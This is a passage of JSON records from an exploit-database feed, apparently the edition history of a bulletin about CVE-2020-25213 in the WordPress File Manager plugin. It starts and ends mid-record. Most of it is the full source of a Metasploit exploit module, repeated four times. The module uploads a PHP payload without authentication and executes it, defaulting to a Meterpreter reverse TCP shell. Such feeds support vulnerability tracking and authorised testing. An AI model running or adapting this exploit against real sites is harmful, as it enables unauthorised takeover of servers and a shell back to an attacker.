"obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-22T06:21:26", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-22T06:21:26", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-22T06:21:26", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-22] #", "category": "", "verified": false}, "lastseen": "2021-09-22T06:21:26", "differentElements": ["sourceData"], "edition": 19}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "b67860c3fe5b31226d426c2891aa972f", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-23T00:59:50", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-23T00:59:50", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-23T00:59:50", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-23] #", "category": "", "verified": false}, "lastseen": "2021-09-23T00:59:50", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "158077ad48724fdc1d4e9d6470b00627", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-23T22:20:19", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-23T22:20:19", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-23T22:20:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-24] #", "category": "", "verified": false}, "lastseen": "2021-09-23T22:20:19", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "6a6884b5961e2c02742619e2059dc04c", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.", "published": "2020-11-10T00:00:00", "modified": "2020-11-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/35215", "reporter": "zdt", "references": [], "cvelist": ["CVE-2020-25213"], "immutableFields": [], "lastseen": "2021-09-25T00:19:23", "history": [], "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:AA7F75B5-85DC-4246-932B-C13A3A39B197"]}, {"type": "cve", "idList": ["CVE-2020-25213"]}, {"type": "wpexploit", "idList": ["WPEX-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:E528AE38-72F0-49FF-9878-922EFF59ACE9"]}, {"type": "dsquare", "idList": ["E-722"]}, {"type": "nessus", "idList": ["WORDPRESS_PLUGIN_WP_FILE_MANAGER_6_9_RCE.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160003"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:7D610378313C0D3F9F5525CC2D5907A7"]}, {"type": "thn", "idList": ["THN:7FD924637D99697D78D53283817508DA"]}], "modified": "2021-09-25T00:19:23", "rev": 2}, "score": {"value": 7.2, "vector": "NONE", "modified": "2021-09-25T00:19:23", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/35215", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::HTTP::Wordpress\r\n prepend Msf::Exploit::Remote::AutoCheck\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(\r\n update_info(\r\n info,\r\n 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',\r\n 'Description' => %q{\r\n The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and\r\n execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php\r\n extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write\r\n PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Alex Souza (w4fz5uck5)', # initial discovery and PoC\r\n 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],\r\n [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],\r\n [ 'CVE', '2020-25213' ]\r\n ],\r\n 'Platform' => [ 'php' ],\r\n 'Privileged' => false,\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' =>\r\n [\r\n [\r\n 'WordPress File Manager 6.0-6.8',\r\n {\r\n 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }\r\n }\r\n ]\r\n ],\r\n 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020\r\n 'DefaultTarget' => 0\r\n )\r\n )\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),\r\n OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])\r\n ]\r\n )\r\n end\r\n\r\n def check\r\n return CheckCode::Unknown unless wordpress_and_online?\r\n\r\n # check the plugin version from readme\r\n check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')\r\n end\r\n\r\n def exploit\r\n # base path to File Manager plugin\r\n file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')\r\n # filename of the file to be uploaded/created\r\n filename = \"#{Rex::Text.rand_text_alphanumeric(6)}.php\"\r\n register_file_for_cleanup(filename)\r\n\r\n case datastore['COMMAND']\r\n when 'upload'\r\n elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)\r\n when 'mkfile+put'\r\n elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)\r\n elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)\r\n end\r\n\r\n payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)\r\n print_status(\"#{peer} - Payload is at #{payload_uri}\")\r\n # execute the payload\r\n send_request_cgi('uri' => normalize_uri(payload_uri))\r\n end\r\n\r\n # make it easier to switch between \"upload\" and \"mkfile+put\" exploit methods\r\n def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})\r\n filename = opts['filename']\r\n\r\n # prep for exploit\r\n post_data = Rex::MIME::Message.new\r\n post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name=\"cmd\"')\r\n\r\n case elfinder_cmd\r\n when 'upload'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"upload[]\\\"; filename=\\\"#{filename}\\\"\")\r\n when 'mkfile'\r\n post_data.add_part('l1_', nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(filename, nil, nil, 'form-data; name=\"name\"')\r\n when 'put'\r\n post_data.add_part(\"l1_#{Rex::Text.encode_base64(filename)}\", nil, nil, 'form-data; name=\"target\"')\r\n post_data.add_part(payload.encoded, nil, nil, 'form-data; name=\"content\"')\r\n end\r\n\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),\r\n 'method' => 'POST',\r\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n 'data' => post_data.to_s\r\n )\r\n\r\n fail_with(Failure::Unreachable, \"#{peer} - Could not connect\") unless res\r\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unexpected HTTP response code: #{res.code}\") unless res.code == 200\r\n end\r\nend\n\n# 0day.today [2021-09-25] #", "category": "", "verified": false}, "lastseen": "2021-09-25T00:19:23", "differentElements": ["sourceData"], "edition": 22}, {"bulletin": {"id": "1337DAY-ID-35215", "vendorId": null, "hash": "b1b3ec13fdace525120d3eb9a807a2b3", "type": "zdt", "bulletinFamily": "exploit", "title": "WordPress File Manager 6.8 Remote Code Execution Exploit", "description": "The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute 